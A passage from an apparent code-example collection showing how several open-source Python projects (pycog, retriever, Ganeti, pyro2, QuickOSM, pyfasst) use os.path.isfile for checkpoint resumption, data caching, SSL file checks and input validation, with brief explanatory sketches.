File to save network information in.
"""
checkfreq = self.p['checkfreq']
if checkfreq is None:
checkfreq = int(1e4)//gradient_data.minibatch_size
patience = self.p['patience']
if patience is None:
patience = 100*checkfreq
alpha = self.p['dt']/self.p['tau']
lambda_Omega = self.p['lambda_Omega']
lr = self.p['learning_rate']
maxnorm = self.p['max_gradient_norm']
bound = self.p['bound']
save_exclude = ['callback', 'performance', 'terminate']
#---------------------------------------------------------------------------------
# Continue previous run if we can
#---------------------------------------------------------------------------------
if os.path.isfile(savefile):
with open(savefile) as f:
save = pickle.load(f)
best = save['best']
init_p = save['current']
first_iter = save['iter']
costs_history = save['costs_history']
Omega_history = save['Omega_history']
# Restore RNGs for datasets
gradient_data.rng = save['rng_gradient']
validation_data.rng = save['rng_validation']
# Restore parameter values
for i, j in zip(self.trainables, init_p):
i.set_value(j)
print(("[ {}.SGD.train ] Recovered saved model,"
" continuing from iteration {}.").format(THIS, first_iter))
else:
best = {
'iter': 1,
'cost': np.inf,
'other_costs': [],
'params': SGD.get_values(self.save_values)
}
first_iter = best['iter']
costs_history = []
Omega_history = []
# Save initial conditions
save = {
'params': {k: v for k, v in self.p.items()
if k not in save_exclude},
'varlist': self.trainable_names,
'iter': 1,
'current': SGD.get_values(self.trainables),
'best': best,
'costs_history': costs_history,
'Omega_history': Omega_history,
'rng_gradient': gradient_data.rng,
'rng_validation': validation_data.rng
}
base, ext = os.path.splitext(savefile)
dump(base + '_init' + ext, save)
#---------------------------------------------------------------------------------
# Updates
#---------------------------------------------------------------------------------
performance = self.p['performance']
terminate = self.p['terminate']
tr_Omega = None
tr_gnorm = None
try:
tstart = datetime.datetime.now()
for iter in xrange(first_iter, 1+self.p['max_iter']):
if iter % checkfreq == 1:
#---------------------------------------------------------------------
# Timestamp
#---------------------------------------------------------------------
tnow = datetime.datetime.now()
totalsecs = (tnow - tstart).total_seconds()
hrs = int(totalsecs//3600)
mins = int(totalsecs%3600)//60
secs = int(totalsecs%60)
timestamp = tnow.strftime('%b %d %Y %I:%M:%S %p').replace(' 0', ' ')
print('{} updates - {} ({} hrs {} mins {} secs elapsed)'
.format(iter-1, timestamp, hrs, mins, secs))
#---------------------------------------------------------------------
# Validate
#---------------------------------------------------------------------
# Validation cost
costs = self.f_cost(*validation_data(best['other_costs']))
z = costs[-1] # network outputs
costs = [float(i) for i in costs[:-1]]
s0 = "| validation loss / RMSE"
s1 = ": {:.6f} / {:.6f}".format(costs[0], costs[1])
# Dashes
nfill = 70
# Compute task-specific performance
if performance is not None:
costs.append(performance(validation_data.get_trials(),
SGD.get_value(z)))
s0 += " / performance"
s1 += " / {:.2f}".format(costs[-1])
s = s0 + s1
# Callback
if self.p['callback'] is not None:
callback_results = self.p['callback'](
validation_data.get_trials(), SGD.get_value(z)
)
else:
callback_results = None
# Keep track of costs
costs_history.append((gradient_data.ntrials, costs))
# Record the value of the regularization term in the last iteration
if tr_Omega is not None:
Omega_history.append(
(gradient_data.ntrials, lambda_Omega*tr_Omega)
)
# New best
if costs[0] < best['cost']:
s += ' ' + '-'*(nfill - len(s))
s += " NEW BEST (prev. best: {:.6f})".format(best['cost'])
best = {
'iter': iter,
'cost': costs[0],
'other_costs': costs[1:],
'params': SGD.get_values(self.save_values)
}
print(s)
# Spectral radius
rho = RNN.spectral_radius(self.Wrec_.eval())
# Format
Omega = ('n/a' if tr_Omega is None
else '{:.8f}'.format(float(tr_Omega)))
gnorm = ('n/a' if tr_gnorm is None
else '{:.8f}'.format(float(tr_gnorm)))
# Info
print("| Omega (last iter) = {}".format(Omega))
print("| grad. norm (last iter) = {}".format(gnorm))
print("| rho = {:.8f}".format(rho))
sys.stdout.flush()
#---------------------------------------------------------------------
# Save progress
#---------------------------------------------------------------------
save = {
'params': {k: v for k, v in self.p.items()
if k not in save_exclude},
'varlist': self.trainable_names,
'iter': iter,
'current': SGD.get_values(self.trainables),
'best': best,
'costs_history': costs_history,
'Omega_history': Omega_history,
'rng_gradient': gradient_data.rng,
'rng_validation': validation_data.rng
}
dump(savefile, save)
if costs[1] <= self.p['min_error']:
print("Reached minimum error of {:.6f}"
.format(self.p['min_error']))
break
# This termination criterion assumes that performance is not None
if terminate(np.array([c[-1] for _, c in costs_history])):
print("Termination criterion satisfied -- we\'ll call it a day.")
break
if iter - best['iter'] > patience:
print("We've run out of patience -- time to give up.")
break
#-------------------------------------------------------------------------
# Training step
#-------------------------------------------------------------------------
tr_cost, tr_gnorm, tr_Omega, tr_nelems, tr_x = self.train_step(
*(gradient_data(best['other_costs'], callback_results)
+ [alpha, lambda_Omega, lr, maxnorm, bound])
)
#-------------------------------------------------------------------------
except KeyboardInterrupt:
print("[ {}.SGD.train ] Training interrupted by user during iteration {}."
.format(THIS, iter))
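The key os.path.isfile usage here is the resume logic at the top of train(): if the savefile already exists, the pickled training state is restored and iteration continues from where it stopped; otherwise a fresh state is initialized and dumped. A simplified sketch of that resume-or-initialize idiom with pickle (the checkpoint keys are illustrative, not pycog's actual save format):

import os
import pickle

def load_or_init_state(savefile):
    # Resume from a checkpoint if present, otherwise start from scratch.
    if os.path.isfile(savefile):
        with open(savefile, 'rb') as f:
            return pickle.load(f)
    return {'iter': 1, 'best_cost': float('inf'), 'history': []}

def save_state(savefile, state):
    with open(savefile, 'wb') as f:
        pickle.dump(state, f)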
0
Example 84
Project: retriever Source File: bbs50stop.py
def download(self, engine=None, debug=False):
try:
Script.download(self, engine, debug)
engine = self.engine
# Species table
table = Table("species", cleanup=Cleanup(), contains_pk=True,
header_rows=9)
table.columns=[("species_id", ("pk-int",) ),
("AOU", ("int",) ),
("english_common_name", ("char",50) ),
("french_common_name", ("char",50) ),
("spanish_common_name", ("char",50) ),
("sporder", ("char",30) ),
("family", ("char",30) ),
("genus", ("char",30) ),
("species", ("char",50) ),
]
table.fixed_width = [7,6,51,51,51,51,51,51,50]
engine.table = table
engine.create_table()
engine.insert_data_from_url(self.urls["species"])
# Routes table
engine.download_files_from_archive(self.urls["routes"], ["routes.csv"])
engine.auto_create_table(Table("routes", cleanup=Cleanup()),
filename="routes.csv")
engine.insert_data_from_file(engine.format_filename("routes.csv"))
# Weather table
if not os.path.isfile(engine.format_filename("weather_new.csv")):
engine.download_files_from_archive(self.urls["weather"],
["weather.csv"])
read = open(engine.format_filename("weather.csv"), "rb")
write = open(engine.format_filename("weather_new.csv"), "wb")
print("Cleaning weather data...")
for line in read:
values = line.split(b',')
newvalues = []
for value in values:
if ':' in value:
newvalues.append(value.replace(':', ''))
elif value == "N":
newvalues.append(None)
else:
newvalues.append(value)
write.write(','.join(str(value) for value in newvalues))
write.close()
read.close()
engine.auto_create_table(Table("weather", pk="RouteDataId",
cleanup=Cleanup(correct_invalid_value, nulls=['NULL'])),
filename="weather_new.csv")
engine.insert_data_from_file(engine.format_filename("weather_new.csv"))
# Region_codes table
table = Table("region_codes", pk=False, header_rows=11,
fixed_width=[11, 11, 30])
def regioncodes_cleanup(value, engine):
replace = {chr(225):"a", chr(233):"e", chr(237):"i", chr(243):"o"}
newvalue = str(value)
for key in list(replace.keys()):
if key in newvalue:
newvalue = newvalue.replace(key, replace[key])
return newvalue
table.cleanup = Cleanup(regioncodes_cleanup)
table.columns=[("countrynum" , ("int",) ),
("regioncode" , ("int",) ),
("regionname" , ("char",30) )]
engine.table = table
engine.create_table()
engine.insert_data_from_url(self.urls["region_codes"])
# Counts table
table = Table("counts", pk=False, delimiter=',')
table.columns=[("RouteDataID" , ("int",) ),
("countrynum" , ("int",) ),
("statenum" , ("int",) ),
("Route" , ("int",) ),
("RPID" , ("int",) ),
("year" , ("int",) ),
("AOU" , ("int",) ),
("Stop1" , ("int",) ),
("Stop2" , ("int",) ),
("Stop3" , ("int",) ),
("Stop4" , ("int",) ),
("Stop5" , ("int",) ),
("Stop6" , ("int",) ),
("Stop7" , ("int",) ),
("Stop8" , ("int",) ),
("Stop9" , ("int",) ),
("Stop10" , ("int",) ),
("Stop11" , ("int",) ),
("Stop12" , ("int",) ),
("Stop13" , ("int",) ),
("Stop14" , ("int",) ),
("Stop15" , ("int",) ),
("Stop16" , ("int",) ),
("Stop17" , ("int",) ),
("Stop18" , ("int",) ),
("Stop19" , ("int",) ),
("Stop20" , ("int",) ),
("Stop21" , ("int",) ),
("Stop22" , ("int",) ),
("Stop23" , ("int",) ),
("Stop24" , ("int",) ),
("Stop25" , ("int",) ),
("Stop26" , ("int",) ),
("Stop27" , ("int",) ),
("Stop28" , ("int",) ),
("Stop29" , ("int",) ),
("Stop30" , ("int",) ),
("Stop31" , ("int",) ),
("Stop32" , ("int",) ),
("Stop33" , ("int",) ),
("Stop34" , ("int",) ),
("Stop35" , ("int",) ),
("Stop36" , ("int",) ),
("Stop37" , ("int",) ),
("Stop38" , ("int",) ),
("Stop39" , ("int",) ),
("Stop40" , ("int",) ),
("Stop41" , ("int",) ),
("Stop42" , ("int",) ),
("Stop43" , ("int",) ),
("Stop44" , ("int",) ),
("Stop45" , ("int",) ),
("Stop46" , ("int",) ),
("Stop47" , ("int",) ),
("Stop48" , ("int",) ),
("Stop49" , ("int",) ),
("Stop50" , ("int",) )]
part = ""
engine.table = table
engine.create_table()
for part in range(1,11):
part = str(part)
try:
print("Inserting data from part " + part + "...")
try:
engine.table.cleanup = Cleanup()
engine.insert_data_from_archive(self.urls["counts"] +
"Fifty" + part + ".zip",
["fifty" + part + ".csv"])
except:
print("Failed bulk insert on " + part + ", inserting manually.")
engine.connection.rollback()
engine.table.cleanup = Cleanup(correct_invalid_value,
nulls=['*'])
engine.insert_data_from_archive(self.urls["counts"] +
"Fifty" + part + ".zip",
["fifty" + part + ".csv"])
except:
print("There was an error in part " + part + ".")
raise
except zipfile.BadZipfile:
print("There was an unexpected error in the Breeding Bird Survey archives.")
raise
return engine
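In the weather-table step, os.path.isfile guards an expensive operation: the raw weather.csv is only downloaded and rewritten when weather_new.csv is not already on disk. A minimal sketch of that skip-if-output-exists idiom (paths are placeholders and the replace() call stands in for the real cleanup logic):

import os

def clean_weather(raw_path, clean_path):
    # Only regenerate the cleaned file when it is missing.
    if os.path.isfile(clean_path):
        return clean_path
    with open(raw_path) as src, open(clean_path, 'w') as dst:
        for line in src:
            dst.write(line.replace(':', ''))   # stand-in for the real cleanup
    return clean_path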
0
Example 85
Project: ganeti Source File: daemon.py
def GenericMain(daemon_name, optionparser,
check_fn, prepare_fn, exec_fn,
multithreaded=False, console_logging=False,
default_ssl_cert=None, default_ssl_key=None,
warn_breach=False):
"""Shared main function for daemons.
@type daemon_name: string
@param daemon_name: daemon name
@type optionparser: optparse.OptionParser
@param optionparser: initialized optionparser with daemon-specific options
(common -f -d options will be handled by this module)
@type check_fn: function which accepts (options, args)
@param check_fn: function that checks start conditions and exits if they're
not met
@type prepare_fn: function which accepts (options, args)
@param prepare_fn: function that is run before forking, or None;
its result will be passed as the third parameter to exec_fn, or
if None was passed in, we will just pass None to exec_fn
@type exec_fn: function which accepts (options, args, prepare_results)
@param exec_fn: function that's executed with the daemon's pid file held, and
runs the daemon itself.
@type multithreaded: bool
@param multithreaded: Whether the daemon uses threads
@type console_logging: boolean
@param console_logging: if True, the daemon will fall back to the system
console if logging fails
@type default_ssl_cert: string
@param default_ssl_cert: Default SSL certificate path
@type default_ssl_key: string
@param default_ssl_key: Default SSL key path
@type warn_breach: bool
@param warn_breach: issue a warning at daemon launch time, before
daemonizing, about the possibility of breaking parameter privacy
invariants through the otherwise helpful debug logging.
"""
optionparser.add_option("-f", "--foreground", dest="fork",
help="Don't detach from the current terminal",
default=True, action="store_false")
optionparser.add_option("-d", "--debug", dest="debug",
help="Enable some debug messages",
default=False, action="store_true")
optionparser.add_option("--syslog", dest="syslog",
help="Enable logging to syslog (except debug"
" messages); one of 'no', 'yes' or 'only' [%s]" %
constants.SYSLOG_USAGE,
default=constants.SYSLOG_USAGE,
choices=["no", "yes", "only"])
family = ssconf.SimpleStore().GetPrimaryIPFamily()
# family will default to AF_INET if there is no ssconf file (e.g. when
# upgrading a cluster from 2.2 -> 2.3. This is intended, as Ganeti clusters
# <= 2.2 can not be AF_INET6
if daemon_name in constants.DAEMONS_PORTS:
default_bind_address = constants.IP4_ADDRESS_ANY
if family == netutils.IP6Address.family:
default_bind_address = constants.IP6_ADDRESS_ANY
default_port = netutils.GetDaemonPort(daemon_name)
# For networked daemons we allow choosing the port and bind address
optionparser.add_option("-p", "--port", dest="port",
help="Network port (default: %s)" % default_port,
default=default_port, type="int")
optionparser.add_option("-b", "--bind", dest="bind_address",
help=("Bind address (default: '%s')" %
default_bind_address),
default=default_bind_address, metavar="ADDRESS")
optionparser.add_option("-i", "--interface", dest="bind_interface",
help=("Bind interface"), metavar="INTERFACE")
if default_ssl_key is not None and default_ssl_cert is not None:
optionparser.add_option("--no-ssl", dest="ssl",
help="Do not secure HTTP protocol with SSL",
default=True, action="store_false")
optionparser.add_option("-K", "--ssl-key", dest="ssl_key",
help=("SSL key path (default: %s)" %
default_ssl_key),
default=default_ssl_key, type="string",
metavar="SSL_KEY_PATH")
optionparser.add_option("-C", "--ssl-cert", dest="ssl_cert",
help=("SSL certificate path (default: %s)" %
default_ssl_cert),
default=default_ssl_cert, type="string",
metavar="SSL_CERT_PATH")
# Disable the use of fork(2) if the daemon uses threads
if multithreaded:
utils.DisableFork()
options, args = optionparser.parse_args()
if getattr(options, "bind_interface", None) is not None:
if options.bind_address != default_bind_address:
msg = ("Can't specify both, bind address (%s) and bind interface (%s)" %
(options.bind_address, options.bind_interface))
print >> sys.stderr, msg
sys.exit(constants.EXIT_FAILURE)
interface_ip_addresses = \
netutils.GetInterfaceIpAddresses(options.bind_interface)
if family == netutils.IP6Address.family:
if_addresses = interface_ip_addresses[constants.IP6_VERSION]
else:
if_addresses = interface_ip_addresses[constants.IP4_VERSION]
if len(if_addresses) < 1:
msg = "Failed to find IP for interface %s" % options.bind_interace
print >> sys.stderr, msg
sys.exit(constants.EXIT_FAILURE)
options.bind_address = if_addresses[0]
if getattr(options, "ssl", False):
ssl_paths = {
"certificate": options.ssl_cert,
"key": options.ssl_key,
}
for name, path in ssl_paths.iteritems():
if not os.path.isfile(path):
print >> sys.stderr, "SSL %s file '%s' was not found" % (name, path)
sys.exit(constants.EXIT_FAILURE)
# TODO: By initiating http.HttpSslParams here we would only read the files
# once and have a proper validation (isfile returns False on directories)
# at the same time.
result, running_uid, expected_uid = _VerifyDaemonUser(daemon_name)
if not result:
msg = ("%s started using wrong user ID (%d), expected %d" %
(daemon_name, running_uid, expected_uid))
print >> sys.stderr, msg
sys.exit(constants.EXIT_FAILURE)
if check_fn is not None:
check_fn(options, args)
log_filename = constants.DAEMONS_LOGFILES[daemon_name]
# node-daemon logging in lib/http/server.py, _HandleServerRequestInner
if options.debug and warn_breach:
sys.stderr.write(constants.DEBUG_MODE_CONFIDENTIALITY_WARNING % daemon_name)
if options.fork:
# Newer GnuTLS versions (>= 3.3.0) use a library constructor for
# initialization and open /dev/urandom on library load time, way before we
# fork(). Closing /dev/urandom causes subsequent ganeti.http.client
# requests to fail and the process to receive a SIGABRT. As we cannot
# reliably detect GnuTLS's socket, we work our way around this by keeping
# all fds referring to /dev/urandom open.
noclose_fds = []
for fd in os.listdir("/proc/self/fd"):
try:
if os.readlink(os.path.join("/proc/self/fd", fd)) == "/dev/urandom":
noclose_fds.append(int(fd))
except EnvironmentError:
# The fd might have disappeared (although it shouldn't as we're running
# single-threaded).
continue
utils.CloseFDs(noclose_fds=noclose_fds)
(wpipe, stdio_reopen_fn) = utils.Daemonize(logfile=log_filename)
else:
(wpipe, stdio_reopen_fn) = (None, None)
log_reopen_fn = \
utils.SetupLogging(log_filename, daemon_name,
debug=options.debug,
stderr_logging=not options.fork,
multithreaded=multithreaded,
syslog=options.syslog,
console_logging=console_logging)
# Reopen log file(s) on SIGHUP
signal.signal(signal.SIGHUP,
compat.partial(_HandleSigHup, [log_reopen_fn, stdio_reopen_fn]))
try:
utils.WritePidFile(utils.DaemonPidFileName(daemon_name))
except errors.PidFileLockError, err:
print >> sys.stderr, "Error while locking PID file:\n%s" % err
sys.exit(constants.EXIT_FAILURE)
try:
try:
logging.info("%s daemon startup", daemon_name)
if callable(prepare_fn):
prep_results = prepare_fn(options, args)
else:
prep_results = None
except Exception, err:
utils.WriteErrorToFD(wpipe, _BeautifyError(err))
raise
if wpipe is not None:
# we're done with the preparation phase, we close the pipe to
# let the parent know it's safe to exit
os.close(wpipe)
exec_fn(options, args, prep_results)
finally:
utils.RemoveFile(utils.DaemonPidFileName(daemon_name))
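Before daemonizing, the SSL certificate and key paths are checked with os.path.isfile and the daemon exits if either is missing (the comment in the example also notes that isfile conveniently rejects directories). A short, hedged sketch of that pre-flight check; the paths below are placeholders, so running it as-is will simply report the first missing file and exit:

import os
import sys

def check_required_files(paths):
    # Abort early if any required file is missing; isfile also rejects directories.
    for name, path in paths.items():
        if not os.path.isfile(path):
            sys.stderr.write("SSL %s file '%s' was not found\n" % (name, path))
            sys.exit(1)

check_required_files({'certificate': '/etc/ganeti/server.pem',
                      'key': '/etc/ganeti/server.key'})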
0
Example 86
Project: pyro2 Source File: pyro.py
def doit(solver_name, problem_name, param_file,
other_commands=None,
comp_bench=False, make_bench=False):
msg.bold('pyro ...')
tc = profile.TimerCollection()
tm_main = tc.timer("main")
tm_main.begin()
# import desired solver under "solver" namespace
solver = importlib.import_module(solver_name)
#-------------------------------------------------------------------------
# runtime parameters
#-------------------------------------------------------------------------
# parameter defaults
rp = runparams.RuntimeParameters()
rp.load_params("_defaults")
rp.load_params(solver_name + "/_defaults")
# problem-specific runtime parameters
rp.load_params(solver_name + "/problems/_" + problem_name + ".defaults")
# now read in the inputs file
if not os.path.isfile(param_file):
# check if the param file lives in the solver's problems directory
param_file = solver_name + "/problems/" + param_file
if not os.path.isfile(param_file):
msg.fail("ERROR: inputs file does not exist")
rp.load_params(param_file, no_new=1)
# and any commandline overrides
if other_commands is not None:
rp.command_line_params(other_commands)
# write out the inputs.auto
rp.print_paramfile()
#-------------------------------------------------------------------------
# initialization
#-------------------------------------------------------------------------
# initialize the Simulation object -- this will hold the grid and
# data and know about the runtime parameters and which problem we
# are running
sim = solver.Simulation(solver_name, problem_name, rp, timers=tc)
sim.initialize()
sim.preevolve()
#-------------------------------------------------------------------------
# evolve
#-------------------------------------------------------------------------
verbose = rp.get_param("driver.verbose")
plt.ion()
sim.cc_data.t = 0.0
# output the 0th data
basename = rp.get_param("io.basename")
sim.cc_data.write("{}{:04d}".format(basename, sim.n))
dovis = rp.get_param("vis.dovis")
if dovis:
plt.figure(num=1, figsize=(8, 6), dpi=100, facecolor='w')
sim.dovis()
while not sim.finished():
# fill boundary conditions
sim.cc_data.fill_BC_all()
# get the timestep
sim.compute_timestep()
# evolve for a single timestep
sim.evolve()
if verbose > 0: print("%5d %10.5f %10.5f" % (sim.n, sim.cc_data.t, sim.dt))
# output
if sim.do_output():
if verbose > 0: msg.warning("outputting...")
basename = rp.get_param("io.basename")
sim.cc_data.write("{}{:04d}".format(basename, sim.n))
# visualization
if dovis:
tm_vis = tc.timer("vis")
tm_vis.begin()
sim.dovis()
store = rp.get_param("vis.store_images")
if store == 1:
basename = rp.get_param("io.basename")
plt.savefig("{}{:04d}.png".format(basename, sim.n))
tm_vis.end()
tm_main.end()
#-------------------------------------------------------------------------
# benchmarks (for regression testing)
#-------------------------------------------------------------------------
# are we comparing to a benchmark?
if comp_bench:
compare_file = "{}/tests/{}{:04d}".format(
solver_name, basename, sim.n)
msg.warning("comparing to: {} ".format(compare_file))
try: bench_grid, bench_data = patch.read(compare_file)
except:
msg.warning("ERROR openning compare file")
return "ERROR openning compare file"
result = compare.compare(sim.cc_data.grid, sim.cc_data,
bench_grid, bench_data)
if result == 0:
msg.success("results match benchmark\n")
else:
msg.warning("ERROR: " + compare.errors[result] + "\n")
# are we storing a benchmark?
if make_bench:
if not os.path.isdir(solver_name + "/tests/"):
try: os.mkdir(solver_name + "/tests/")
except:
msg.fail("ERROR: unable to create the solver's tests/ directory")
bench_file = solver_name + "/tests/" + basename + "%4.4d" % (sim.n)
msg.warning("storing new benchmark: {}\n".format(bench_file))
sim.cc_data.write(bench_file)
#-------------------------------------------------------------------------
# final reports
#-------------------------------------------------------------------------
if verbose > 0: rp.print_unused_params()
if verbose > 0: tc.report()
sim.finalize()
if comp_bench:
return result
else:
return None
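The inputs file is looked up twice: if os.path.isfile fails on the path as given, the solver's problems/ directory is tried before the run fails. A small sketch of that fallback search (the directory layout is assumed from the example, and FileNotFoundError makes it Python 3 only):

import os

def resolve_param_file(param_file, solver_name):
    # Try the path as given, then fall back to the solver's problems directory.
    if os.path.isfile(param_file):
        return param_file
    candidate = os.path.join(solver_name, 'problems', param_file)
    if os.path.isfile(candidate):
        return candidate
    raise FileNotFoundError('inputs file does not exist: ' + param_file)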
0
Example 87
Project: QuickOSM Source File: osm_parser.py
def parse(self):
"""
Start parsing the osm file
"""
# Configuration for OGR
gdal.SetConfigOption('OSM_CONFIG_FILE', self._osm_conf)
gdal.SetConfigOption('OSM_USE_CUSTOM_INDEXING', 'NO')
if not isfile(self.__osmFile):
raise GeoAlgorithmExecutionException("File doesn't exist")
uri = self.__osmFile + "|layername="
layers = {}
# If loadOnly, no parsing required:
# It's used only when we ask to open an osm file
if self.__loadOnly:
file_name = basename(self.__osmFile)
for layer in self.__layers:
layers[layer] = QgsVectorLayer(
uri + layer, file_name + " " + layer, "ogr")
if not layers[layer].isValid():
print "Error on the layer", layers[layer].lastError()
return layers
# Check that nodes appear before ways/relations in the file.
# We don't check that ways come before relations,
# because a file may contain only nodes and relations.
with open(self.__osmFile) as f:
for line in f:
if re.search(r'node', line):
break
if re.search(r'(way|relation)', line):
raise WrongOrderOSMException
# For each layer
for layer in self.__layers:
self.signalText.emit(tr("QuickOSM", u"Parsing layer : " + layer))
layers[layer] = {}
# Reading it with a QgsVectorLayer
layers[layer]['vectorLayer'] = QgsVectorLayer(
uri + layer, "test_" + layer, "ogr")
if not layers[layer]['vectorLayer'].isValid():
msg = "Error on the layer : " + \
layers[layer]['vectorLayer'].lastError()
raise GeoAlgorithmExecutionException(msg)
layers[layer]['vectorLayer'].setProviderEncoding('UTF-8')
# Set some default tags
layers[layer]['tags'] = ['full_id', 'osm_id', 'osm_type']
# Save the geometry type of the layer
layers[layer]['geomType'] = layers[layer]['vectorLayer'].wkbType()
# Set a featureCount
layers[layer]['featureCount'] = 0
# Get the other_tags
fields = layers[layer]['vectorLayer'].pendingFields()
field_names = [field.name() for field in fields]
other_tags_index = field_names.index('other_tags')
features = layers[layer]['vectorLayer'].getFeatures()
for i, feature in enumerate(features):
layers[layer]['featureCount'] += 1
# Speed up parsing: if the whitelist column is just a comma,
# skip tag parsing entirely (featureCount is still needed)
if self.__whiteListColumn[layer] == ',':
continue
# Get the "others_tags" field
attributes = feature.attributes()[other_tags_index]
if attributes:
h_store = pghstore.loads(attributes)
for key in h_store:
if key not in layers[layer]['tags']:
# If the key in OSM is not already in the table
if self.__whiteListColumn[layer]:
if key in self.__whiteListColumn[layer]:
layers[layer]['tags'].append(key)
else:
layers[layer]['tags'].append(key)
percent = int(100 / len(self.__layers) * (i + 1))
self.signalPercentage.emit(percent)
# Delete empty layers if this option is set to True
if self.__deleteEmptyLayers:
delete_layers = []
for keys, values in layers.iteritems():
if values['featureCount'] < 1:
delete_layers.append(keys)
for layer in delete_layers:
del layers[layer]
# Creating GeoJSON files for each layers
for layer in self.__layers:
msg = tr("QuickOSM", u"Creating GeoJSON file : " + layer)
self.signalText.emit(msg)
self.signalPercentage.emit(0)
# Creating the temp file
tf = tempfile.NamedTemporaryFile(
delete=False, suffix="_" + layer + ".geojson")
layers[layer]['geojsonFile'] = tf.name
tf.flush()
tf.close()
# Adding the attribute table
fields = QgsFields()
for key in layers[layer]['tags']:
fields.append(QgsField(key, QVariant.String))
encoding = get_default_encoding()
file_writer = QgsVectorFileWriter(
layers[layer]['geojsonFile'],
encoding,
fields,
layers[layer]['geomType'],
layers[layer]['vectorLayer'].crs(),
'GeoJSON')
# For each feature in the layer
features = layers[layer]['vectorLayer'].getFeatures()
for i, feature in enumerate(features):
fet = QgsFeature()
fet.setGeometry(feature.geometry())
new_attributes = []
attributes = feature.attributes()
if layer in ['points', 'lines', 'multilinestrings']:
if layer == 'points':
osm_type = "node"
elif layer == 'lines':
osm_type = "way"
elif layer == 'multilinestrings':
osm_type = 'relation'
new_attributes.append(
self.DIC_OSM_TYPE[osm_type] + str(attributes[0]))
new_attributes.append(attributes[0])
new_attributes.append(osm_type)
if attributes[1]:
h_store = pghstore.loads(attributes[1])
for tag in layers[layer]['tags'][3:]:
if unicode(tag) in h_store:
new_attributes.append(h_store[tag])
else:
new_attributes.append("")
fet.setAttributes(new_attributes)
file_writer.addFeature(fet)
elif layer == 'multipolygons':
if attributes[0]:
osm_type = "relation"
new_attributes.append(
self.DIC_OSM_TYPE[osm_type] + str(attributes[0]))
new_attributes.append(str(attributes[0]))
else:
osm_type = "way"
new_attributes.append(
self.DIC_OSM_TYPE[osm_type] + str(attributes[1]))
new_attributes.append(attributes[1])
new_attributes.append(osm_type)
h_store = pghstore.loads(attributes[2])
for tag in layers[layer]['tags'][3:]:
if unicode(tag) in h_store:
new_attributes.append(h_store[tag])
else:
new_attributes.append("")
fet.setAttributes(new_attributes)
file_writer.addFeature(fet)
percentage = int(
100 / layers[layer]['featureCount'] * (i + 1))
self.signalPercentage.emit(percentage)
del file_writer
return layers
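Parsing starts with a hard check: if isfile fails on the .osm path, the method raises immediately rather than letting OGR open a missing file and produce empty layers. A minimal sketch of that fail-fast guard; the exception here is the built-in FileNotFoundError rather than QGIS's GeoAlgorithmExecutionException:

from os.path import isfile

def open_osm_file(osm_file):
    # Fail fast with a clear message before handing the path to OGR/QGIS.
    if not isfile(osm_file):
        raise FileNotFoundError("File doesn't exist: " + osm_file)
    return osm_file + "|layername="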
0
Example 88
Project: pyfasst Source File: separateLeadFunctions.py
def generate_WF0_TR_chirped(transform, minF0, maxF0, stepNotes=4,
Ot=0.5, perF0=1,
depthChirpInSemiTone=0.5, loadWF0=True,
verbose=False):
"""\
Generates a 'basis' matrix for the source part WF0, using the
source model KLGLOTT88, with the following I/O arguments:
Inputs:
:param transform:
the time-frequency transform object; the sampling
rate, FFT size and analysis window are derived from it
:param minF0:
the minimum value for the fundamental
frequency (F0)
:param maxF0:
the maximum value for F0
:param stepNotes:
the number of F0 per semitone
:param Ot:
the glottal opening coefficient for
KLGLOTT88
:param perF0:
the number of chirps considered per F0
value
:param depthChirpInSemiTone:
the maximum value, in semitone, of the
allowed chirp per F0
Outputs:
:returns:
* `F0Table` -
the vector containing the values of the fundamental
frequencies in Hertz (Hz) corresponding to the
harmonic combs in WF0, i.e. the columns of WF0
* `WF0` -
the basis matrix, where each column is a harmonic comb
generated by KLGLOTT88 (with a sinusoidal model, then
transformed into the spectral domain)
Notes:
20120828T2358 Horribly slow...
"""
if hasattr(transform, 'octaveNr'):
lengthWindow = (
transform.cqtkernel.FFTLen * (2**(transform.octaveNr-1)))
elif hasattr(transform, 'cqtkernel'):
lengthWindow = transform.cqtkernel.linFTLen
else:
try:
lengthWindow = (transform.freqbins - 1) * 2 * 2 # just to be sure
except AttributeError:
raise AttributeError(
'There is something utterly wrong with the desired '+
'TF representation...\n'+
'No freqbins attribute!')
# generating a filename to keep data:
attributesToKeep = ('fmin', 'fmax', 'bins', 'fs', 'winFunc',
'freqbins', 'atomHopFactor')
attributes = [(k.lower()+'-'+str(v) if (k in attributesToKeep and
np.isscalar(v)) else
v.__name__ if (k in attributesToKeep and
type(v)==type(lambda x:x)) else
'') for k,v in transform.__dict__.items()]
significantAttributes = [] # keeping only non-empty attributes
for att in attributes:
if att != '':
significantAttributes.append(att)
attributes = significantAttributes
attributes.sort()
print attributes #DEBUG
filename = str('').join(['wf0_%s_' %transform.transformname,
'_minF0-', str(minF0),
'_maxF0-', str(maxF0),
'_stepNotes-', str(int(stepNotes)),
'_Ot-', str(Ot),
'_perF0-', str(int(perF0)),
'_depthChirp-', str(depthChirpInSemiTone),
'_lengthWindow-%d' %lengthWindow,
'_', str('_').join(attributes),
'.npz'])
#filename = str('').join(['wf0_%s_' %transform.transformname,
# '_', str('_').join(attributes),
# '.npz'])
##np.savez(filename, test=None) # to check size of filename on write
# print len(filename), filename #DEBUG
if os.path.isfile(filename) and loadWF0:
print "Reading WF0 and F0Table from stored arrays in %s." %filename
struc = np.load(filename)
return struc['F0Table'], struc['WF0'], struc['tft'].tolist()
else:
print "No such file: %s." %filename
print "First time WF0 computed with these parameters, please wait..."
# converting to double arrays:
minF0=np.double(minF0)
maxF0=np.double(maxF0)
Fs=np.double(transform.fs)
stepNotes=np.double(stepNotes)
if hasattr(transform, 'cqtkernel'):
if hasattr(transform.cqtkernel, 'linFTLen'):
Nfft = transform.cqtkernel.linFTLen
else:
Nfft = transform.cqtkernel.FFTLen
else:
Nfft = (transform.freqbins - 1) * 2
analysisWindow = transform.winFunc(lengthWindow)
# computing the F0 table:
numberOfF0 = np.ceil(12.0 * stepNotes * np.log2(maxF0 / minF0)) + 1
F0Table = minF0 * (2 ** (np.arange(numberOfF0,dtype=np.double) \
/ (12 * stepNotes)))
numberElementsInWF0 = numberOfF0 * perF0
# computing the desired WF0 matrix
WF0 = np.zeros([transform.freqbins,
numberElementsInWF0],
dtype=np.double)
# slow... try faster : concatenate the odgd, compute one big cqt of that
# result and extract only the desired frames:
##odgds = np.array([])
for fundamentalFrequency in np.arange(numberOfF0):
if verbose>0:
print " f0 n.", fundamentalFrequency+1, "/", numberOfF0
odgd, odgdSpec = \
generate_ODGD_spec(F0Table[fundamentalFrequency], Fs, \
Ot=Ot, lengthOdgd=lengthWindow, \
